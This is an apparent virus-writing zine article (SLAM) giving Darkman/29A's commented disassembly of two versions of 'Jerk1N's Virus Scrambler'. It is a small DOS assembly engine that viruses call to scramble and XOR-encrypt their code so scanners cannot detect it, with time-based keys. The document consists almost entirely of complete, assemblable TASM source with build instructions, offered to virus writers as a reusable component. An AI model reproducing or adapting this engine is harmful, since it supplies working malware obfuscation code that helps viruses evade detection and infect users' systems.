Copy Link
Add to Bookmark
Report
SLAM4.033: Jerk1N's Virus Scrambler disassembled by Darkman/29a
----------------------------------------------------------------[JVS_10.ASM]--
comment *
Jerk1N's Virus Scrambler v 1.0 [JVS]
Disassembly by
Darkman/29A
Calling parameters:
CX Length of plain code
DS:AX Pointer to plain code
Jerk1N's Virus Scrambler v 1.0 [JVS] size: 131 bytes.
Compile Jerk1N's Virus Scrambler v 1.... with Turbo Assembler v 4.0 by typing:
TASM /M JVS.ASM
*
public jvs_begin,jvs,scrambler,jvs_end,jvs_size
.model tiny
.code
code_begin:
jvs_begin equ $ ; Beginning of Jerk1N's Virus Scra...
jvs proc near ; Jerk1N's Virus Scrambler v 1.0 [...
push bp di si ; Save registers at stack
call delta_offse_
delta_offset:
engine_name db '[JVS' ; Name of the engine
delta_offse_:
pop bp ; Load BP from stack
sub bp,offset delta_offset
push bx ; Save BX at stack
push ax cx ; Save registers at stack
call xor_cryptor
crypt_begin:
mov ax,00h ; Get system time
int 1ah
mov ss:[bp+crypt_key],dx
pop cx ax ; Load registers from stack
mov si,ax ; SI = offset of plain code
add si,cx ; Add length of plain code to offs...
mov di,ax ; DI = offset of plain code
push ax dx cx ; Save registers at stack
mov dx,00h ; Zero DX
mov ax,cx ; AX = length of plain code
mov cx,04h ; Divide by four
div cx ; AX = length of plain code in four
mov ss:[bp+plain_end],si
mov ss:[bp+plain_begin],di
mov ss:[bp+plain_length],ax
call scrambler
pop cx dx ax ; Load registers from stack
crypt_end:
pop bx ; Load BX from stack
call xor_cryptor
pop si di bp ; Load registers from stack
ret ; Return!
endp
scrambler proc near ; Encryptor/decryptor of Jerk1N's ...
plain_end equ word ptr $+01h ; Offset of end of plain code
mov si,1111h ; SI = offset of end of plain code
plain_begin equ word ptr $+01h ; Offset of beginning of plain code
mov di,1111h ; DI = offset of beginning of plai...
plain_length equ word ptr $+01h ; Length of plain code in four
mov cx,1111h ; CX = length of plain code in four
push ax bp ; Save registers at stack
xor ax,ax ; Zero AX
xor bp,bp ; Zero BP
scrambl_loop:
mov ax,[di] ; AX = word of first half of plain...
mov bp,[si] ; BP = word of second half of plai...
mov [di],bp ; Store word of second half of pla...
mov [si],ax ; Store word of first hald of plai...
dec si ; Decrease SI
dec si ; Decrease SI
inc di ; Increase DI
inc di ; Increase DI
loop scrambl_loop
pop bp ax ; Load registers from stack
ret ; Return!
endp
crypt_key dw ? ; 16-bit encryption/decryption key
xor_cryptor proc near ; 16-bit XOR encryptor/decryptor
push bx ; Save BX at stack
mov cx,(crypt_end-crypt_begin)/02h
lea bx,[bp+crypt_begin] ; BX = offset of crypt_begin
mov ax,ss:[bp+crypt_key]
crypt_loop:
xor [bx],ax ; 16-bit XOR encrypt/decrypt
inc bx ; Increase BX
inc bx ; " "
loop crypt_loop
pop bx ; Load BX from stack
ret ; Return!
endp
jvs_end equ $ ; End of Jerk1N's Virus Scrambler ...
jvs_size equ $-jvs_begin ; Size of Jerk1N's Virus Scrambler...
code_end:
end code_begin
----------------------------------------------------------------[JVS_10.ASM]--
----------------------------------------------------------------[JVS_13.ASM]--
comment *
Jerk1N's Virus Scrambler v 1.3 [JVS]
Disassembly by
Darkman/29A
Calling parameters:
DX Flags
CX Length of plain code
DS:AX Pointer to plain code
Flags:
xxxxxxx1 Don't encrypt plain code.
1111111x Unused.
Jerk1N's Virus Scrambler v 1.3 [JVS] size: 142 bytes.
Compile Jerk1N's Virus Scrambler v 1.... with Turbo Assembler v 4.0 by typing:
TASM /M JVS.ASM
*
public jvs_begin,jvs,scrambler,jvs_end,jvs_size
.model tiny
.code
code_begin:
jvs_begin equ $ ; Beginning of Jerk1N's Virus Scra...
jvs proc near ; Jerk1N's Virus Scrambler v 1.3 [...
push bp di si ; Save registers at stack
call delta_offse_
delta_offset:
engine_name db '[JVS 1.3' ; Name of the engine
delta_offse_:
pop bp ; Load BP from stack
sub bp,offset delta_offset
push bx ; Save BX at stack
push dx ax cx ; Save registers at stack
call xor_cryptor
crypt_begin:
mov ax,00h ; Get system time
int 1ah
mov ss:[bp+crypt_key],dx
pop cx ax dx ; Load registers from stack
mov si,ax ; SI = offset of plain code
add si,cx ; Add length of plain code to offs...
mov di,ax ; DI = offset of plain code
push ax cx ; Save registers at stack
push dx ; Save DX at stack
mov dx,00h ; Zero DX
mov ax,cx ; AX = length of plain code
mov cx,04h ; Divide by four
div cx ; AX = length of plain code in four
mov ss:[bp+plain_end],si
mov ss:[bp+plain_begin],di
mov ss:[bp+plain_length],ax
pop dx ; Load DX from stack
cmp dx,01h ; Don't encrypt plain code?
je dont_encrypt ; Equal? Jump to dont_encrypt
call scrambler
dont_encrypt:
pop cx ax ; Load registers from stack
crypt_end:
pop bx ; Load BX from stack
call xor_cryptor
pop si di bp ; Load registers from stack
ret ; Return!
endp
scrambler proc near ; Encryptor/decryptor of Jerk1N's ...
plain_end equ word ptr $+01h ; Offset of end of plain code
mov si,1111h ; SI = offset of end of plain code
plain_begin equ word ptr $+01h ; Offset of beginning of plain code
mov di,1111h ; DI = offset of beginning of plai...
plain_length equ word ptr $+01h ; Length of plain code in four
mov cx,1111h ; CX = length of plain code in four
push ax bp ; Save registers at stack
xor ax,ax ; Zero AX
xor bp,bp ; Zero BP
scrambl_loop:
mov ax,[di] ; AX = word of first half of plain...
mov bp,[si] ; BP = word of second half of plai...
mov [di],bp ; Store word of second half of pla...
mov [si],ax ; Store word of first hald of plai...
dec si ; Decrease SI
dec si ; Decrease SI
inc di ; Increase DI
inc di ; Increase DI
loop scrambl_loop
pop bp ax ; Load registers from stack
ret ; Return!
endp
crypt_key dw ? ; 16-bit encryption/decryption key
xor_cryptor proc near ; 16-bit XOR encryptor/decryptor
push bx ; Save BX at stack
mov cx,(crypt_end-crypt_begin)/02h
lea bx,[bp+crypt_begin] ; BX = offset of crypt_begin
mov ax,ss:[bp+crypt_key]
crypt_loop:
xor [bx],ax ; 16-bit XOR encrypt/decrypt
inc bx ; Increase BX
inc bx ; " "
loop crypt_loop
pop bx ; Load BX from stack
ret ; Return!
endp
jvs_end equ $ ; End of Jerk1N's Virus Scrambler ...
jvs_size equ $-jvs_begin ; Size of Jerk1N's Virus Scrambler...
code_end:
end code_begin
----------------------------------------------------------------[JVS_13.ASM]--
